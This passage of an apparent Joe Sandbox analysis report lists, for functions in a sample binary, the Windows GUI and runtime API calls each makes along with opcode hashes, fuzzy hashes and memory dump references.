                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveFocus$MessageSend
                                                                  • String ID: u
                                                                  • API String ID: 1556911595-4067256894
                                                                  • Opcode ID: fb8890b4c5c68d31774b083e687a655fc513fa39d58349acaa57dc8e84718e08
                                                                  • Instruction ID: 8fd8094d5251e22a7b4bb0aff080dc5562fdb4009df02e4aeb02dc57dcea32e5
                                                                  • Opcode Fuzzy Hash: fb8890b4c5c68d31774b083e687a655fc513fa39d58349acaa57dc8e84718e08
                                                                  • Instruction Fuzzy Hash: 25112FB2500209BBCF24EB38DC08A6E7F69EF40300B840162E949DA3A4CB34DD00DA92
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 002A2C57
                                                                  • GetStockObject.GDI32(0000000D), ref: 002A2C5F
                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 002A2C6C
                                                                  • GetDC.USER32(00000000), ref: 002A2C7B
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A2C8F
                                                                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 002A2C9B
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002A2CA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: 4c478cd628138b3f8fdfc763edcc00c9314cea188b7067e780c9dc124cc538eb
                                                                  • Instruction ID: 8a39e2013b525f7f0209a530c4eb0c42c6f5999e835e06910f1186985d51c949
                                                                  • Opcode Fuzzy Hash: 4c478cd628138b3f8fdfc763edcc00c9314cea188b7067e780c9dc124cc538eb
                                                                  • Instruction Fuzzy Hash: 67118F71650358EBEB109BA5EC89FAE7BA9EB55751F01001AFA09AF1C0DE709D05CB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001E0CC8
                                                                  • GetWindowRect.USER32(?,?), ref: 001E0D17
                                                                  • OffsetRect.USER32(?,?,?), ref: 001E0D2D
                                                                    • Part of subcall function 001D03A2: __EH_prolog3.LIBCMT ref: 001D03A9
                                                                    • Part of subcall function 001D03A2: GetDC.USER32(00000000), ref: 001D03D5
                                                                  • CreateCompatibleDC.GDI32(?), ref: 001E0D9E
                                                                  • SelectObject.GDI32(?,?), ref: 001E0DBE
                                                                  • SelectObject.GDI32(?,?), ref: 001E0E00
                                                                  • CreateCompatibleDC.GDI32(?), ref: 001E0F19
                                                                  • SelectObject.GDI32(?,?), ref: 001E0F39
                                                                  • SelectObject.GDI32(?,00000000), ref: 001E0F69
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$CompatibleCreateRect$H_prolog3H_prolog3_OffsetWindow
                                                                  • String ID:
                                                                  • API String ID: 2818906880-0
                                                                  • Opcode ID: f43d5183107965b08a61492f0fd2f3911020c69794c46fe96fbd19f3ece10c86
                                                                  • Instruction ID: a64179ba5f8fad36c262d2824f9de2664bd0611825359b1741bf196d561ad4f8
                                                                  • Opcode Fuzzy Hash: f43d5183107965b08a61492f0fd2f3911020c69794c46fe96fbd19f3ece10c86
                                                                  • Instruction Fuzzy Hash: 06A11471D00259EFCF15EFA5C984AEEBBB5BF18300F1441AAE90AB7251DB705A45CFA0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001CA97B
                                                                  • OleDuplicateData.OLE32(?,?,00000000), ref: 001CA9FC
                                                                  • GlobalLock.KERNEL32(00000000), ref: 001CAA2B
                                                                  • CopyMetaFileW.GDI32(?,00000000), ref: 001CAA37
                                                                  • GlobalUnlock.KERNEL32(?), ref: 001CAA47
                                                                  • GlobalFree.KERNEL32(?), ref: 001CAA50
                                                                  • GlobalUnlock.KERNEL32(?), ref: 001CAA5C
                                                                  • lstrlenW.KERNEL32(?,0000005C,002A2FF2,?,?,?), ref: 001CAABC
                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,0000005C,002A2FF2,?,?,?), ref: 001CABB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3_LockMetalstrlen
                                                                  • String ID:
                                                                  • API String ID: 3489744035-0
                                                                  • Opcode ID: 7f10b98e3f94361ef9ed46dc4740293b523029e80fc8d977d32c147c59f29873
                                                                  • Instruction ID: 36d5c5de49bfdffaa3e2d671dfcee6ad535a7894eb5a5a85afa7f19a5441397a
                                                                  • Opcode Fuzzy Hash: 7f10b98e3f94361ef9ed46dc4740293b523029e80fc8d977d32c147c59f29873
                                                                  • Instruction Fuzzy Hash: F3818EB190060AAFDB159FA4CD88E3ABBB9FF64308751851DF45ADB650DB30EC11CBA1
                                                                  APIs
                                                                    • Part of subcall function 0020B291: GetParent.USER32(?), ref: 0020B29D
                                                                    • Part of subcall function 0020B291: GetParent.USER32(00000000), ref: 0020B2A0
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • GetParent.USER32(?), ref: 001DF248
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001DF25D
                                                                  • GetClientRect.USER32(?,?), ref: 001DF2C4
                                                                  • GetClientRect.USER32(?,?), ref: 001DF2D9
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A
                                                                  • GetWindowRect.USER32(?,?), ref: 001DF2F9
                                                                    • Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F
                                                                  • GetParent.USER32(?), ref: 001DF348
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001DF35C
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 001DF3B1
                                                                  • PostMessageW.USER32(?,00000000,00000000), ref: 001DF3D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientMessageParent$RectSendWindow$Screen$LongPost
                                                                  • String ID:
                                                                  • API String ID: 3884207962-0
                                                                  • Opcode ID: 51368319cd24e514d49f180a27b024a41bb04cade6389bd91a13d557b8053f2d
                                                                  • Instruction ID: 57d0b4c12bfe01a963d00f6fb522d902d8fb572fa95e70cdc4408d2a18a8ede8
                                                                  • Opcode Fuzzy Hash: 51368319cd24e514d49f180a27b024a41bb04cade6389bd91a13d557b8053f2d
                                                                  • Instruction Fuzzy Hash: 59610BB1900209AFCF15DFA9DC85AAEBBF5FF88300F11456AF945AB261DB719901CF60
                                                                  APIs
                                                                    • Part of subcall function 001D1116: GetFocus.USER32 ref: 001D111C
                                                                    • Part of subcall function 001D1116: GetParent.USER32(00000000), ref: 001D1144
                                                                    • Part of subcall function 001D1116: GetWindowLongW.USER32(?,000000F0), ref: 001D115F
                                                                    • Part of subcall function 001D1116: GetParent.USER32(?), ref: 001D116D
                                                                    • Part of subcall function 001D1116: GetDesktopWindow.USER32 ref: 001D1171
                                                                    • Part of subcall function 001D1116: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 001D1185
                                                                  • GetMenu.USER32(?), ref: 0020781C
                                                                  • GetMenuItemCount.USER32(?), ref: 0020784C
                                                                  • GetSubMenu.USER32(?,00000000), ref: 0020785D
                                                                  • GetMenuItemCount.USER32(?), ref: 0020787F
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002078A0
                                                                  • GetSubMenu.USER32(?,00000000), ref: 002078B8
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002078D0
                                                                  • GetMenuItemCount.USER32(?), ref: 00207907
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00207922
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                  • String ID:
                                                                  • API String ID: 4186786570-0
                                                                  • Opcode ID: 932eb70e429ab18102ea570d0e341efb089ea147b8e2db8ffdca6d986bb390e2
                                                                  • Instruction ID: 1c916832c2150b2b394824825b5b0db8686f06a34a61ee17d83e7d4e406de5c8
                                                                  • Opcode Fuzzy Hash: 932eb70e429ab18102ea570d0e341efb089ea147b8e2db8ffdca6d986bb390e2
                                                                  • Instruction Fuzzy Hash: C6516130D1430A9FCF119FA4CDC8AADBBB5FF58310F208569E456A61A2D731ED51DB60
                                                                  APIs
                                                                  • GetKeyState.USER32(00000001), ref: 00209CB8
                                                                  • GetCursorPos.USER32(?), ref: 00209CDF
                                                                  • ScreenToClient.USER32(?,?), ref: 00209CEC
                                                                  • GetCapture.USER32 ref: 00209D41
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • ClientToScreen.USER32(?,?), ref: 00209D88
                                                                  • WindowFromPoint.USER32(?,?), ref: 00209D94
                                                                  • IsChild.USER32(?,00000000), ref: 00209DA9
                                                                  • KillTimer.USER32(?,0000E001), ref: 00209DE6
                                                                  • KillTimer.USER32(?,0000E000), ref: 00209E02
                                                                    • Part of subcall function 001DBF29: GetForegroundWindow.USER32 ref: 001DBF3D
                                                                    • Part of subcall function 001DBF29: GetLastActivePopup.USER32(?), ref: 001DBF4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
                                                                  • String ID:
                                                                  • API String ID: 1544770960-0
                                                                  • Opcode ID: 239e5c26b9858f8d65658f094bd4763a5c96a8b3b3c12b55913ab956c888bb12
                                                                  • Instruction ID: ace95caeefe19a8f89094b04c6f686656ac16331ecb38734f0a262b6ee5047cd
                                                                  • Opcode Fuzzy Hash: 239e5c26b9858f8d65658f094bd4763a5c96a8b3b3c12b55913ab956c888bb12
                                                                  • Instruction Fuzzy Hash: 13417031660706AFCB20AF64DC88AAEBBB6FF54310B104669E456D72E3DB31DD90CB40
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,0000420F,00000001), ref: 001E99C9
                                                                  • EnableMenuItem.USER32(?,0000420E,00000001), ref: 001E99E5
                                                                  • CheckMenuItem.USER32(?,00004213,00000008), ref: 001E9A1A
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 001E9A3A
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 001E9A5E
                                                                  • EnableMenuItem.USER32(?,00004213,00000001), ref: 001E9A6A
                                                                  • EnableMenuItem.USER32(?,00004214,00000001), ref: 001E9A76
                                                                  • EnableMenuItem.USER32(?,00004215,00000001), ref: 001E9ABE
                                                                  • CheckMenuItem.USER32(?,00004215,00000008), ref: 001E9AD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Enable$Check
                                                                  • String ID:
                                                                  • API String ID: 1852492618-0
                                                                  • Opcode ID: aca8a10e57b4855c57c6b0accebea6c32cf6fd98ff6b9a0df050859c8213250a
                                                                  • Instruction ID: bdbc19ba74d3bed2812e03f81cd73941cac51f85288907f505168e1d487640c7
                                                                  • Opcode Fuzzy Hash: aca8a10e57b4855c57c6b0accebea6c32cf6fd98ff6b9a0df050859c8213250a
                                                                  • Instruction Fuzzy Hash: 6041B370780A81ABDB248F17CD85B69B7A1BF90704F558079B909AF2E5D7B1DC80CB94
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 001D14E9
                                                                  • EnterCriticalSection.KERNEL32(?,00000010,001D16B2,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D14FA
                                                                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1518
                                                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D154C
                                                                  • LeaveCriticalSection.KERNEL32(001C106C,?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D15B8
                                                                  • _memset.LIBCMT ref: 001D15D7
                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 001D15E8
                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1609
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                  • String ID:
                                                                  • API String ID: 1891723912-0
                                                                  • Opcode ID: a0f99d99901e488658b970a42f2524b306d2211455c5de27712e796cdb851d6f
                                                                  • Instruction ID: a134ffeed29d9d0d0d4af4371c6304c1a349b9c6534b24d83753b25e90bb4a81
                                                                  • Opcode Fuzzy Hash: a0f99d99901e488658b970a42f2524b306d2211455c5de27712e796cdb851d6f
                                                                  • Instruction Fuzzy Hash: 68318BB1500605BFCB24EF10E885D6ABBB5FF54310B21C52EF55A9A660CB31ED50CF90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Delete_memset$H_prolog3
                                                                  • String ID: TR/
                                                                  • API String ID: 1235337548-3081264625
                                                                  • Opcode ID: f72d26c809d21fa59730186fe97273c9066be85e778e8c36580b86aa2bdbe027
                                                                  • Instruction ID: 47d03bb42022412a50439be6a6f129ddaeb37de94b643118013eaa676729cfb7
                                                                  • Opcode Fuzzy Hash: f72d26c809d21fa59730186fe97273c9066be85e778e8c36580b86aa2bdbe027
                                                                  • Instruction Fuzzy Hash: D3224AB0D1062ADFCF18DFA4C9816EDBBB5FF08700F10809AE559AB251DB715AA5CF90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002173E7
                                                                  • GetWindow.USER32(?,00000005), ref: 00217407
                                                                  • GetWindow.USER32(?,00000002), ref: 0021743D
                                                                  • IsWindowVisible.USER32(?), ref: 00217521
                                                                  • GetWindow.USER32(?,00000002), ref: 002177B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$H_prolog3Visible
                                                                  • String ID: 83/$2
                                                                  • API String ID: 3969123015-1965019549
                                                                  • Opcode ID: 615ae14ae8f4566fd926f37b5acb02281b085f8996dcb10f04286134222c8120
                                                                  • Instruction ID: a6bb647044c31915272a2cb136a13cf1dd1eb27161c395304e8cc31affb951f5
                                                                  • Opcode Fuzzy Hash: 615ae14ae8f4566fd926f37b5acb02281b085f8996dcb10f04286134222c8120
                                                                  • Instruction Fuzzy Hash: 8ED17D30A146069FDF15EF64C889AFDB7F6BFA8300F140169E846AB291DF349D91CB61
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 0020FFBC
                                                                  • GetWindowRect.USER32(?,?), ref: 0020FFD5
                                                                  • PtInRect.USER32(?,?,?), ref: 0020FFF3
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00210004
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0021005C
                                                                    • Part of subcall function 001DAB9B: GetParent.USER32(?), ref: 001DABA5
                                                                  • GetFocus.USER32 ref: 00210138
                                                                    • Part of subcall function 001FD042: __EH_prolog3_GS.LIBCMT ref: 001FD04C
                                                                    • Part of subcall function 001FD042: GetWindowRect.USER32(?,?), ref: 001FD0E5
                                                                    • Part of subcall function 001FD042: SetRect.USER32(0020FF16,00000000,00000000,?,?), ref: 001FD107
                                                                    • Part of subcall function 001FD042: CreateCompatibleDC.GDI32(?), ref: 001FD113
                                                                    • Part of subcall function 001FD042: CreateCompatibleBitmap.GDI32(?,0020FF16,`2), ref: 001FD13D
                                                                    • Part of subcall function 001FD042: GetWindowRect.USER32(?,?), ref: 001FD19F
                                                                    • Part of subcall function 001FD042: GetClientRect.USER32(?,?), ref: 001FD1A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
                                                                  • String ID: `2
                                                                  • API String ID: 2914356772-2259872102
                                                                  • Opcode ID: 0e5dbbb8cd497f77e92234eeb30d0b89d5b47c27ac2ca49e1743235fb9800920
                                                                  • Instruction ID: 99339ec58d9326205fc68e0771214c53d3e52fdcc5e98ebcd6f9aac358b1f188
                                                                  • Opcode Fuzzy Hash: 0e5dbbb8cd497f77e92234eeb30d0b89d5b47c27ac2ca49e1743235fb9800920
                                                                  • Instruction Fuzzy Hash: 6D81E4707107069FCB269F6498C5ABEB7EAFF98700F24456EF4458B292DBB19CD08B50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
